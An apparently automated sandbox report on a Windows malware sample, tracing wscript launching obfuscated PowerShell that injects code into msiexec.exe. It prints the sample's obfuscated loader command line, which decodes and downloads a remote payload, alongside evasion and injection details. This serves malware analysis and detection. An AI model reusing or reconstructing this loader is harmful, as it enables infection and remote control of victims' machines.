              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921976127.0000000008A50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbht source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbk source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lenn", "0")
              Source: Yara matchFile source: 00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Julemessens)$global:Thomist = [System.Text.Encoding]::ASCII.GetString($Explicability)$global:opsttende=$Thomist.substring($Eksekverbare,$trikstank)<#Guldmedaljernes Denaturering Twa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Untranscendent $Lagerbeholdning $Sexsymbolernes), (Xiphuous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hearty = [AppDomain]::CurrentDomain.GetAssembli
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Podagry)), $Grooming).DefineDynamicModule($Sherifian, $false).DefineType($Carmot, $Pyrophobia, [System.MulticastDelegate])$Beaterman.D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Julemessens)$global:Thomist = [System.Text.Encoding]::ASCII.GetString($Explicability)$global:opsttende=$Thomist.substring($Eksekverbare,$trikstank)<#Guldmedaljernes Denaturering Twa
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, started with an obfuscated PowerShell command line
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, started with an obfuscated PowerShell command line
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B22CFE8 push esp; retf 2_2_00007FFB4B22CFE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2F4DC9 push ebx; ret 2_2_00007FFB4B2F4F5A
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4737
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5175
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7708
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2013
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: powershell.exe, 00000002.00000002.1619913276.00000291EDA3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_7756.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4160000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2ECFA38
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. 
X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio FritlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" (with the same obfuscated command line as the wscript.exe-spawned instance above, lowercased)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
